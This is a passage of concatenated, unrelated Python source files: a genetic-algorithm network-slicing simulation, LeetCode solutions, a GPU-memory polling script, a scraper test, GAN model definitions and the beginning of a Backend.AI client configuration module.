continue
else:
# 放弃杂交
elder_brother = mather
younger_brother = father
break
updatepopulation[populations - l - 2] = elder_brother
updatepopulation[populations - l - 1] = younger_brother
return updatepopulation
pass
# 染色体变异
def mutation(sr, rbsc, population, pm=0.01):
"""
:param rbsc:
:param sr:
:param population: 经交叉后得到的种群
:param pm: 变异概率默认是0.01
:return: 经变异操作后的新种群
"""
updatepopulation = np.copy(population)
populations, m, n = np.shape(population)
# 计算需要变异的基因个数
gene_num = np.uint8(populations * m * n * pm)
# 将所有的基因按照序号进行10进制编码,则共有populations * m个基因
# 随机抽取gene_num个基因进行基本位变异
mutationGeneIndex = random.sample(range(0, populations * m * n), gene_num)
# 确定每个将要变异的基因在整个染色体中的基因座(即基因的具体位置)
for gene in mutationGeneIndex:
# 确定变异基因位于第几个染色体
chromosomeIndex = gene // (m * n)
# 确定变异基因位于当前染色体的第几个基因位
geneIndex = gene % (m * n)
# 确定在染色体矩阵哪行
sr_location = geneIndex // n
# 确定在染色体矩阵哪行
bs_location = geneIndex % n
# mutation
chromosome = np.array(population[chromosomeIndex])
if chromosome[sr_location, bs_location] == 0:
for i in range(n):
chromosome[sr_location, i] = 0
chromosome[sr_location, bs_location] = 1
else:
chromosome[sr_location, bs_location] = 0
j = random.randint(0, n - 1)
chromosome[sr_location, j] = 1
if check(sr, rbsc, chromosome):
updatepopulation[chromosomeIndex] = np.copy(chromosome)
return updatepopulation
pass
# 得到个体的适应度值(包括带宽和计算的代价)及每个个体被选择的累积概率
def update_rbsc(sr, rbsc, solution):
m, n = np.shape(solution)
rbsc_realtime = np.array(rbsc)
chromosome = solution
for j in range(m):
for k in range(n):
if chromosome[j][k] == 1:
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
return rbsc_realtime
def ga(SR, RBSC, max_iter=500, delta=0.0001, pc=0.8, pm=0.01, populationSize=10):
# 每次迭代得到的最优解
optimalSolutions = []
optimalValues = []
# 边界处理,当请求数只有1个时候
m = np.size(SR, 0)
n = np.size(RBSC, 0)
if m == 1:
chromosomes = np.zeros((n, 1, n))
for i in range(n):
chromosomes[i][0][i] = 1
check_list = []
for i in range(n):
if check(SR, RBSC, chromosomes[i]):
check_list.append(i)
if len(check_list) == 0:
return "failed", -1
chromosomes = np.zeros((len(check_list), 1, n))
for i in range(len(check_list)):
chromosomes[i][0][check_list[i]] = 1
fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(chromosomes[index[0][0], :, :])
optimalValue = np.min(optimalValues)
optimalIndex = np.where(optimalValues == optimalValue)
optimalSolution = optimalSolutions[optimalIndex[0][0]]
return optimalSolution, optimalValue
# 得到初始种群编码
chromosomes = getInitialPopulation(SR, RBSC, populationSize)
population_num = np.size(chromosomes, 0)
if population_num == 0:
return "failed", -1
fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(chromosomes[index[0][0], :, :])
for iteration in range(max_iter):
# 得到个体适应度值和个体的累积概率
fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
# 选择新的种群
cum_proba = fitness[:, 5]
try:
newpopulations = selectNewPopulation(chromosomes, cum_proba)
except:
print("except in ga:", population_num, chromosomes, np.size(chromosomes, 0), np.shape(chromosomes))
# 进行交叉操作
crossoverpopulation = crossover(SR, RBSC, newpopulations, pc)
# mutation
mutationpopulation = mutation(SR, RBSC, crossoverpopulation, pm)
# 适应度评价
fitness = getFitnessValue(SR, RBSC, mutationpopulation, delta)
# 搜索每次迭代的最优解,以及最优解对应的目标函数的取值
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(mutationpopulation[index[0][0], :, :])
chromosomes = mutationpopulation
# 搜索最优解
optimalValue = np.min(optimalValues)
optimalIndex = np.where(optimalValues == optimalValue)
optimalSolution = optimalSolutions[optimalIndex[0][0]]
return optimalSolution, optimalValue
def getRbsc(bs_num):
rbsc = np.zeros((bs_num, 3), dtype=np.float)
# rbsc = 1.5 - rbsc
# r1 = 5
# r2 = 3
# r3 = 1
r1 = 5
r2 = 2.5
r3 = 1.25
rbsc[0][0] = r1
rbsc[0][1] = r2
rbsc[0][2] = r3
rbsc[1][0] = r1
rbsc[1][1] = r3
rbsc[1][2] = r2
rbsc[2][0] = r2
rbsc[2][1] = r3
rbsc[2][2] = r1
rbsc[3][0] = r2
rbsc[3][1] = r1
rbsc[3][2] = r3
rbsc[4][0] = r3
rbsc[4][1] = r1
rbsc[4][2] = r2
rbsc[5][0] = r3
rbsc[5][1] = r2
rbsc[5][2] = r1
return rbsc
def simu(request_num=15, req_num_eachtime=4, sigma=50000, max_iter=1):
bs_num = 6
# BSC:base station capacity
# RBSC: residuary base station capacity
# SR: slice request
max_iter = 1 # ------------------------
delta = 0.000000001
pc = 0.8
pm = 0.01
# req_num_eachtime = 4
# 构造request_num次请求
# request_num = 15 # --------------------------
values = np.zeros((request_num), dtype=np.float)
solutions = []
sr_all = []
rbscs = []
# 每轮处理请求失败的切片请求数,fails[0]是遗传、fails[1]是贪心总代价、fails[2]是贪心下行带宽、fails[3]是贪心上行带宽、fails[4]是贪心计算资源
fails = np.zeros((7, request_num))
# 记录7中算法每次迭代得到下行,上行,计算,总代价
cost_result = np.zeros((7, request_num, 4), dtype=np.float)
# sigma = 50000
# 构造m个切片请求
m = req_num_eachtime * request_num
sr_total = np.zeros((m, 3), dtype=np.float)
for i in range(m):
s = np.abs(np.random.normal(100, sigma, 3)) + 1
s = s / (sum(s))
sr_total[i] = s
for iter in range(request_num):
print('iter')
print(iter)
# 随机构造每次请求的切片数
m = (iter + 1) * req_num_eachtime
# 构造基站资源
rbsc = getRbsc(bs_num)
total_rbsc = np.sum(rbsc, 0) # 求每列之和,得到1*3向量,分别表示下行,上行,计算资源总量
# 构造m个切片请求
sr = np.zeros((m, 3), dtype=np.float)
for i in range(m):
s = sr_total[i]
sr[i] = s
rbscs.append(rbsc)
print("rbsc:")
print(rbsc)
print("sr:")
print(sr)
sr_all.append(sr) # 记录请求,为其他算法提供相同的请求环境
populationSize = min(m * bs_num, 50)
solution, value = ga(sr, rbsc, max_iter, delta, pc, pm, populationSize)
# 资源紧张的时候,采用greedy算法,得到可以满足的情况
while solution == "failed" and np.size(sr, 0) >= 2:
cost, rbsc_r, solution = greedy.greedy_min_cost(sr, rbsc, delta)
x1 = np.sum(solution, 1) # 求每行之和
cost, rbsc_r, solution = greedy_resource.greedy_min_cost(sr, rbsc, delta)
x2 = np.sum(solution, 1) # 求每行之和
cost, rbsc_r, solution = greedy_down_bandwidth.greedy_min_down_bandwidth_cost(sr, rbsc, delta)
x3 = np.sum(solution, 1) # 求每行之和
cost, rbsc_r, solution = greedy_up_bandwidth.greedy_min_up_bandwidth_cost(sr, rbsc, delta)
x4 = np.sum(solution, 1) # 求每行之和
cost, rbsc_r, solution = greedy_computing.greedy_min_compute_cost(sr, rbsc, delta)
x5 = np.sum(solution, 1) # 求每行之和
XX = np.array((x1, x2, x3, x4, x5))
X = np.array((np.sum(x1), np.sum(x2), np.sum(x3), np.sum(x4), np.sum(x5)))
x = np.max(X)
if x == 0:
solution == "failed"
value = 0
sr = np.array([])
break
index = np.where(X == x)
x = XX[index[0][0]]
sr_list = []
for s in range(np.size(x)):
if x[s] == 1:
sr_list.append(sr[s])
sr = np.array(sr_list)
solution, value = ga(sr, rbsc, max_iter, delta, pc, pm, populationSize)
# 记录失败数目
fails[0][iter] = np.size(sr_all[iter], 0) - np.sum(np.sum(solution))
print('最优目标函数值:', value)
values[iter] = value
print('solution:')
print(solution)
##############################
# 持久化结果
fit = getFitnessValue(sr, rbsc, [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[0][iter][0] = fit[0, 0]
cost_result[0][iter][1] = fit[0, 1]
cost_result[0][iter][2] = fit[0, 2]
cost_result[0][iter][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {iter: o}
# json.dump(result, fp1)
##############################
solutions.append(np.copy(solution))
# rbsc = update_rbsc(sr, rbsc, solution)
print("ga总结果")
print(values)
# print(rbsc)
###########################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy.greedy_min_cost(sr, rbsc, delta)
values[i] = cost
##############################
# 持久化结果
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[1][i][0] = fit[0, 0]
cost_result[1][i][1] = fit[0, 1]
cost_result[1][i][2] = fit[0, 2]
cost_result[1][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
# 记录失败数
fails[1][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
# cost, rbsc, solution = greedy_down_bandwidth.greedy_min_down_bandwidth_cost(sr, rbsc, delta)
cost, rbsc, solution = greedy_bandwidth.greedy_min_bandwidth_cost(sr, rbsc, delta)
values[i] = cost
##############################
# 持久化结果
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[2][i][0] = fit[0, 0]
cost_result[2][i][1] = fit[0, 1]
cost_result[2][i][2] = fit[0, 2]
cost_result[2][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
# 记录失败数
fails[2][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_bandwidth_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy_up_bandwidth.greedy_min_up_bandwidth_cost(sr, rbsc, delta)
values[i] = cost
##############################
# 持久化结果
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[3][i][0] = fit[0, 0]
cost_result[3][i][1] = fit[0, 1]
cost_result[3][i][2] = fit[0, 2]
cost_result[3][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
# 记录失败数
fails[3][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_up_bandwidth_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy_computing.greedy_min_compute_cost(sr, rbsc, delta)
values[i] = cost
##############################
# 持久化结果
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[4][i][0] = fit[0, 0]
cost_result[4][i][1] = fit[0, 1]
cost_result[4][i][2] = fit[0, 2]
cost_result[4][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
##############################
# 记录失败数
fails[4][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0))
print("greedy_min_compute_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = greedy_resource.greedy_min_cost(sr, rbsc, delta)
values[i] = cost
##############################
# 持久化结果
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[5][i][0] = fit[0, 0]
cost_result[5][i][1] = fit[0, 1]
cost_result[5][i][2] = fit[0, 2]
cost_result[5][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
# 记录失败数
fails[5][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("greedy_min_max_cost总结果")
print(values)
##############################################################################################################
for i in range(request_num):
sr = sr_all[i]
rbsc = rbscs[i]
cost, rbsc, solution = random_select.random_select(sr, rbsc, delta)
values[i] = cost
##############################
# 持久化结果
fit = getFitnessValue(sr, rbscs[i], [solution], delta)
o = [fit[0, 0], fit[0, 1], fit[0, 2], fit[0, 3]]
cost_result[6][i][0] = fit[0, 0]
cost_result[6][i][1] = fit[0, 1]
cost_result[6][i][2] = fit[0, 2]
cost_result[6][i][3] = fit[0, 0] + fit[0, 1] + fit[0, 2]
result = {i: o}
# 记录失败数
fails[6][i] = np.size(sr, 0) - np.sum(np.sum(solution, 0), 0)
print("random总结果")
print(values)
##############################################################################################################
print(fails)
# nowtime = (lambda: int(round(time.time() * 1000)))
# nowtime = nowtime()
# print(cost_result[:, :, 0])
# print(cost_result[:, :, 1])
# print(cost_result[:, :, 2])
# print(cost_result[:, :, 3])
# pt.plot_fun_slot(cost_result[:, :, 0], fails, req_num_eachtime, '切片请求数量(个)', '平均下行带宽映射代价',
# str(nowtime) + '下行带宽映射代价' + '_' + str(sigma))
# pt.plot_fun_slot(cost_result[:, :, 1], fails, req_num_eachtime, '切片请求数量(个)', '平均上行带宽映射代价',
# str(nowtime) + '上行带宽映射代价' + '_' + str(sigma))
# pt.plot_fun_slot(cost_result[:, :, 2], fails, req_num_eachtime, '切片请求数量(个)', '平均计算资源映射代价',
# str(nowtime) + '计算资源映射代价' + '_' + str(sigma))
# pt.plot_fun_slot(cost_result[:, :, 3], fails, req_num_eachtime, '切片请求数量(个)', '平均总映射代价',
# str(nowtime) + '总映射代价' + '_' + str(sigma))
# pt.plot_fun_fail_slot(fails, req_num_eachtime, '切片请求数量(个)', '失败率(%)', str(nowtime) + '失败率' + '_' + str(sigma))
return cost_result, fails
if __name__ == '__main__':
request_num = 15
req_num_eachtime = 6
sigma = 5000
max_iter = 1
cost_result = np.zeros((7, request_num, 4), dtype=np.float)
fails = np.zeros((7, request_num))
# 多次取平均
n = 1000
for i in range(n):
cost_result_, fails_ = simu(request_num, req_num_eachtime, sigma, max_iter)
cost_result += cost_result_
fails += fails_
cost_result /= n
fails /= n
nowtime = (lambda: int(round(time.time() * 1000)))
nowtime = nowtime()
pt.plot_fun_slot(cost_result[:, :, 0], fails, req_num_eachtime, '切片请求数量(个)', '平均下行带宽映射代价',
str(nowtime) + '下行带宽映射代价' + '_' + str(max_iter) + '_' + str(n))
pt.plot_fun_slot(cost_result[:, :, 1], fails, req_num_eachtime, '切片请求数量(个)', '平均上行带宽映射代价',
str(nowtime) + '上行带宽映射代价' + '_' + str(max_iter))
pt.plot_fun_slot(cost_result[:, :, 2], fails, req_num_eachtime, '切片请求数量(个)', '平均计算资源映射代价',
str(nowtime) + '计算资源映射代价' + '_' + str(max_iter))
pt.plot_fun_slot((cost_result[:, :, 0] + cost_result[:, :, 1]), fails, req_num_eachtime, '切片请求数量(个)',
'平均带宽资源映射代价',
str(nowtime) + '带宽资源映射代价' + '_' + str(max_iter))
pt.plot_fun_slot(cost_result[:, :, 3], fails, req_num_eachtime, '切片请求数量(个)', '平均总映射代价',
str(nowtime) + '总映射代价' + '_' + str(sigma))
pt.plot_fun_fail_slot(fails, req_num_eachtime, '切片请求数量(个)', '失败率(%)', str(nowtime) + '失败率' + '_' + str(max_iter))
print(cost_result[:, :, 0])
print(cost_result[:, :, 1])
print(cost_result[:, :, 2])
print(cost_result[:, :, 3])
print(fails)
|
from .logo import logoplot
from .utils import AMINO_ACIDS, DNA
|
__author__ = 'schneg'
from astroid import builder
from astroid.utils import ASTWalker
from astroid.exceptions import InferenceError
from astroid.inference import InferenceContext, CallContext
abuilder = builder.AstroidBuilder()
from collections import defaultdict
def infer(node):
try:
return list(node.infer())
except InferenceError:
return ""
def convertible(from_type, to_type):
if from_type == to_type:
return True
if ((from_type == int and to_type == float) or
(from_type == float and to_type == int)):
return True
if from_type == str or to_type == str:
return False
try:
if issubclass(from_type, to_type) or issubclass(to_type, from_type):
return True
except TypeError:
pass
# TODO: this is pretty arbitrary where this line is drawn
return False
def collision_in(infer_list):
already_found = []
for item in infer_list:
item_type = item.pytype()
if not already_found:
already_found.append(item_type)
else:
for other_type in already_found:
if not convertible(item_type, other_type):
raise Exception("Found type %s which conflicts with type %s" % (item_type, other_type))
if item_type not in already_found:
already_found.append(item_type)
return False
class MatchFunc:
def __init__(self, path):
self.path = path
def set_context(self, node, child_node):
pass
def visit_assname(self, node):
"""Look for functions with the same name
Should include imported modules and functions
referenced from classes
"""
if collision_in(node.infer()):
raise Exception("Collision: %s" % node.infer)
def check(path : str, node):
print("In path %s %s" % (path, node))
ASTWalker(MatchFunc(path)).walk(node)
|
#
# @lc app=leetcode.cn id=198 lang=python3
#
# [198] 打家劫舍
#
# @lc code=start
class Solution:
def rob(self, nums: List[int]) -> int:
"""
DP 自底向上
"""
n = len(nums)
dp_i_0, dp_i_1, dp_i_2 = 0, 0, 0
for i in range(n-1, -1, -1):
dp_i_0 = max(dp_i_1, dp_i_2 + nums[i])
dp_i_1, dp_i_2 = dp_i_0, dp_i_1
return dp_i_0
# @lc code=end
|
#!/usr/bin/env python3
"""gem2log"""
from argparse import ArgumentParser
from ctypes import CDLL
from signal import SIGHUP, SIGINT, SIGQUIT, SIGTERM, signal
from sys import exit
from time import sleep
def log(msg):
"""
"""
print(msg)
if separate_log:
logging.info(msg)
def mlockall():
"""
"""
MCL_CURRENT = 1
MCL_FUTURE = 2
MCL_ONFAULT = 4
libc = CDLL(None, use_errno=True)
result = libc.mlockall(MCL_CURRENT | MCL_FUTURE | MCL_ONFAULT)
if result != 0:
result = libc.mlockall(MCL_CURRENT | MCL_FUTURE)
gem_path = '/sys/kernel/debug/dri/0/i915_gem_objects'
MIB = 1024**2
def check_gem():
"""
"""
with open(gem_path) as f:
x = f.readline()
a1, _, a2 = x.partition(', ')
b = int(a2.split(' ')[0])
c = '{}, {} MiB'.format(a1, round(b / MIB, 1))
return c
def signal_handler(signum, frame):
"""
"""
def signal_handler_inner(signum, frame):
pass
for i in sig_list:
signal(i, signal_handler_inner)
print()
exit()
try:
with open(gem_path) as f:
f.readline()
except Exception as e:
print(e)
exit(1)
mlockall()
sig_list = [SIGTERM, SIGINT, SIGQUIT, SIGHUP]
sig_dict = {
SIGINT: 'SIGINT',
SIGQUIT: 'SIGQUIT',
SIGHUP: 'SIGHUP',
SIGTERM: 'SIGTERM'
}
for i in sig_list:
signal(i, signal_handler)
interval = 2
while True:
print(check_gem())
sleep(interval)
|
class solution:
def maxSubArray(self,nums):
s = [nums[0]]*len(nums)
for i in range(1,len(nums)):
s[i] = max(nums[i],s[i-1]+nums[i])
max_s = s[0]
for is_s in s:
if is_s > max_s:
max_s = is_s
return max_s
if __name__ == '__main__':
sol = solution()
nums = [-1]
print(sol.maxSubArray(nums))
|
import os
from unittest import TestCase
from lxml import html
from basketball_reference_web_scraper.html import DailyBoxScoresPage
january_01_2017_html = os.path.join(os.path.dirname(__file__), './01_01_2017_box_scores.html')
class TestDailyBoxScoresPage(TestCase):
def setUp(self):
self.january_01_2017_box_scores_file = open(january_01_2017_html)
self.january_01_2017_box_scores = self.january_01_2017_box_scores_file.read()
def tearDown(self):
self.january_01_2017_box_scores_file.close()
def test_game_url_paths_query(self):
page = DailyBoxScoresPage(html=html.fromstring(self.january_01_2017_box_scores))
self.assertEqual(page.game_url_paths_query, '//td[contains(@class, "gamelink")]/a')
def test_parse_urls(self):
page = DailyBoxScoresPage(html=html.fromstring(self.january_01_2017_box_scores))
urls = page.game_url_paths
self.assertEqual(len(urls), 5)
self.assertEqual(urls[0], '/boxscores/201701010ATL.html')
self.assertEqual(urls[1], '/boxscores/201701010IND.html')
self.assertEqual(urls[2], '/boxscores/201701010LAL.html')
self.assertEqual(urls[3], '/boxscores/201701010MIA.html')
self.assertEqual(urls[4], '/boxscores/201701010MIN.html')
|
import torch
import torch.nn as nn
import math
from torch.autograd import Variable
import torch.nn.functional as F
from torch import Tensor
from torch.nn import Parameter
def nl():
return nn.LeakyReLU(0.2, inplace=True)
def conv(ic, oc, k, s, p, bn=True):
model = []
model.append(nn.Conv2d(ic, oc, k, s, p))
if bn:
model.append(nn.BatchNorm2d(oc))
model.append(nl())
return nn.Sequential(*model)
class FeatureExtractor(nn.Module):
def __init__(self, filters):
super(FeatureExtractor, self).__init__()
layers = []
for i, (in_channels, out_channels, kernel_size, stride, padding) in enumerate(filters):
layers.append(conv(in_channels, out_channels, kernel_size, stride, padding, bn=True if i > 0 else False))
self.out_channels = out_channels
self.model = nn.Sequential(*layers)
def forward(self, x):
return self.model(x)
class ModelG(nn.Module):
def __init__(self, channels):
super(ModelG, self).__init__()
channels[0] = (channels[0] + 2) * 2
layers = []
for in_plane, out_plane in zip(channels[:-1], channels[1:]):
layers.append(nn.Linear(in_plane, out_plane))
layers.append(nl())
self.out_channels = channels[-1]
self.model = nn.Sequential(*layers)
def forward(self, x):
return self.model(x)
class ModelF(nn.Module):
def __init__(self, channels):
super(ModelF, self).__init__()
layers = []
for in_plane, out_plane in zip(channels[:-1], channels[1:]):
layers.append(nn.Linear(in_plane, out_plane))
layers.append(nl())
layers.append(nn.Dropout(p=0.5))
layers.append(nn.Linear(channels[-1], 1))
self.model = nn.Sequential(*layers)
def forward(self, x):
return self.model(x)
class RNDiscriminator(nn.Module):
def __init__(self, feature_extractor, g, f):
super(RNDiscriminator, self).__init__()
self.feature_extractor = feature_extractor
self.g = g
self.f = f
self.featuremap_size = None
def forward(self, image):
x = self.feature_extractor(image)
if not self.featuremap_size:
self.featuremap_size = x.size(2)
assert self.featuremap_size == x.size(2)
batch_size = x.size(0)
k = x.size(1)
d = x.size(2)
# tag arbitrary coordinate
coordinate = torch.arange(-1, 1 + 0.00001, 2 / (d-1)).cuda()
coordinate_x = coordinate.expand(batch_size, 1, d, d)
coordinate_y = coordinate.view(d, 1).expand(batch_size, 1, d, d)
x = torch.cat([x, coordinate_x, coordinate_y], 1)
k += 2
x = x.view(batch_size, k, d ** 2).permute(0, 2, 1)
# concatnate o_i, o_j and q
x_left = x.unsqueeze(1).repeat(1, d ** 2, 1, 1).view(batch_size, d ** 4, k)
x_right = x.unsqueeze(2).repeat(1, 1, d ** 2, 1).view(batch_size, d ** 4, k)
x = torch.cat([x_left, x_right], 2)
x = x.view(batch_size * (d ** 4), k * 2)
# g(o_i, o_j, q)
x = self.g(x)
x = x.view(batch_size, d ** 4, x.size(1))
# Σg(o_i, o_j, q)
x = torch.sum(x, dim=1)
# f(Σg(o_i, o_j, q))
x = self.f(x)
return x
class NormalDiscriminator(nn.Module):
def __init__(self, ndf, nc, n_layer):
super(NormalDiscriminator, self).__init__()
layer = []
layer.append(nn.Conv2d(nc, ndf, 4, 2, 1))
layer.append(nl())
layer.append(nn.Conv2d(ndf, ndf * 2, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 2))
layer.append(nl())
layer.append(nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 4))
layer.append(nl())
layer.append(nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 8))
layer.append(nl())
for _ in range(n_layer):
layer.append(nn.Conv2d(ndf * 8, ndf * 8, 4, 2, 1))
layer.append(nn.BatchNorm2d(ndf * 8))
layer.append(nl())
layer.append(nn.Conv2d(ndf * 8, 1, 4, 1, 0))
self.model = nn.Sequential(*layer)
def forward(self, x):
return self.model(x).view(-1, 1)
def define_D(model_type, image_size, ndf, nc):
n_layer = int(math.log2(image_size)) - 6
assert n_layer >= 0
if model_type == 'dcgan':
return NormalDiscriminator(64, 3, n_layer)
elif model_type == 'rngan':
feature_extractor = FeatureExtractor([
(nc, ndf * 1, 4, 2, 1),
(ndf * 1, ndf * 2, 4, 2, 1),
(ndf * 2, ndf * 4, 4, 2, 1),
(ndf * 4, ndf * 8, 4, 2, 1),
] + [(ndf * 8, ndf * 8, 4, 2, 1)] * n_layer)
prev_out_channels = feature_extractor.out_channels
g = ModelG([prev_out_channels, 512, 512, 512, 512])
prev_out_channels = g.out_channels
f = ModelF([prev_out_channels, 512, 512])
return RNDiscriminator(feature_extractor, g, f)
else:
raise NotImplementedError
class Generator(nn.Module):
def __init__(self, nz, ngf, nc, image_size):
super(Generator, self).__init__()
n_layer = int(math.log2(image_size)) - 6
assert n_layer >= 0
layer = []
layer.append(nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0))
layer.append(nn.BatchNorm2d(ngf * 8))
layer.append(nl())
for _ in range(n_layer):
layer.append(nn.ConvTranspose2d(ngf * 8, ngf * 8, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf * 8))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf * 4))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf * 2))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1))
layer.append(nn.BatchNorm2d(ngf))
layer.append(nl())
layer.append(nn.ConvTranspose2d(ngf, nc, 4, 2, 1))
layer.append(nn.Tanh())
self.model = nn.Sequential(*layer)
def forward(self, z):
return self.model(z)
def define_G(model_type, image_size, nz, ngf, nc):
if model_type == 'dcgan':
return Generator(nz, ngf, nc, image_size)
else:
raise NotImplementedError
|
import enum
import os
from pathlib import Path
import random
import re
from typing import (
Any,
Callable,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
cast,
)
import appdirs
from yarl import URL
__all__ = [
'parse_api_version',
'get_config',
'set_config',
'APIConfig',
'API_VERSION',
'DEFAULT_CHUNK_SIZE',
'MAX_INFLIGHT_CHUNKS',
]
class Undefined(enum.Enum):
token = object()
_config = None
_undefined = Undefined.token
API_VERSION = (6, '20220315')
MIN_API_VERSION = (5, '20191215')
DEFAULT_CHUNK_SIZE = 16 * (2**20) # 16 MiB
MAX_INFLIGHT_CHUNKS = 4
local_state_path = Path(appdirs.user_state_dir('backend.ai', 'Lablup'))
local_cache_path = Path(appdirs.user_cache_dir('backend.ai', 'Lablup'))
def parse_api_version(value: str) -> Tuple[int, str]:
match = re.search(r'^v(?P<major>\d+)\.(?P<date>\d{8})$', value)
if match is not None:
return int(match.group(1)), match.group(2)
raise ValueError('Could not parse the given API version string', value)
T = TypeVar('T')
def default_clean(v: Union[str, Mapping]) -> T:
return cast(T, v)
def get_env(
key: str,
default: Union[str, Mapping, Undefined] = _undefined,
*,
clean: Callable[[Any], T] = default_clean,
) -> T:
"""
Retrieves a configuration value from the environment variables.
The given *key* is uppercased and prefixed by ``"BACKEND_"`` and then
``"SORNA_"`` if the former does not exist.
:param key: The key name.
:param default: The default value returned when there is no corresponding
environment variable.
:param clean: A single-argument function that is applied to the result of lookup
(in both successes and the default value for failures).
The default is returning the value as-is.
:returns: The value processed by the *clean* function.
"""
key = key.upper()
raw = os.environ.get('BACKEND_' + key)
if raw is None:
raw = os.environ.get('SORNA_' + key)
if raw is None:
if default is _undefined:
raise KeyError(key)
result = default
else:
result = raw
return clean(result)
def bool_env(v: str) -> bool:
v = v.lower()
if v in ('y', 'yes', 't', 'true', '1'):
return True
if v in ('n', 'no', 'f', 'false', '0'):
return False
raise ValueError('Unrecognized value of boolean environment variable', v)
def _clean_urls(v: Union[URL, str]) -> List[URL]:
if isinstance(v, URL):
return [v]
urls = []
if isinstance(v, str):
for entry in v.split(','):
url = URL(entry)
if not url.is_absolute():
raise ValueError('URL {} is not absolute.'.format(url))
urls.append(url)
return urls
def _clean_tokens(v: str) -> Tuple[str, ...]:
if not v:
return tuple()
return tuple(v.split(','))
def _clean_address_map(v: Union[str, Mapping]) -> Mapping:
if isinstance(v, dict):
return v
if not isinstance(v, str):
raise ValueError(
f'Storage proxy address map has invalid type "{type(v)}", expected str or dict.',
)
override_map = {}
for assignment in v.split(","):
try:
k, _, v = assignment.partition("=")
if k == '' or v == '':
raise ValueError
except ValueError:
raise ValueError(f"{v} is not a valid mapping expression")
else:
override_map[k] = v
return override_map
class APIConfig:
"""
Represents a set of API client configurations.
The access key and secret key are mandatory -- they must be set in either
environment variables or as the explicit arguments.
:param endpoint: The URL prefix to make API requests via HTTP/HTTPS.
If this is given as ``str`` and contains multiple URLs separated by comma,
the underlying HTTP request-response facility will perform client-side
load balancing and automatic fail-over using them, assuming that all those
URLs indicates a single, same cluster.
The users of the API and CLI will get network connection errors only when
all of the given endpoints fail -- intermittent failures of a subset of endpoints
will be hidden with a little increased latency.
:param endpoint_type: Either ``"api"`` or ``"session"``.
If the endpoint type is ``"api"`` (the default if unspecified), it uses the access key and
secret key in the configuration to access the manager API server directly.
If the endpoint type is ``"session"``, it assumes the endpoint is a Backend.AI console server
which provides cookie-based authentication with username and password.
In the latter, users need to use ``backend.ai login`` and ``backend.ai logout`` to
manage their sign-in status, or the API equivalent in
:meth:`~ai.backend.client.auth.Auth.login` and
:meth:`~ai.backend.client.auth.Auth.logout` methods.
:param version: The API protocol version.
:param user_agent: A custom user-agent string which is sent to the API
server as a ``User-Agent`` HTTP header.
:param access_key: The API access key. If deliberately set to an empty string, the API
requests will be made without signatures (anonymously).
:param secret_key: The API secret key.
:param hash_type: The hash type to generate per-request authentication
signatures.
:param vfolder_mounts: A list of vfolder names (that must belong to the given
access key) to be automatically mounted upon any
:func:`Kernel.get_or_create()
<ai.backend.client.kernel.Kernel.get_or_create>` calls.
"""
DEFAULTS: Mapping[str, Union[str, Mapping]] = {
'endpoint': 'https://api.backend.ai',
'endpoint_type': 'api',
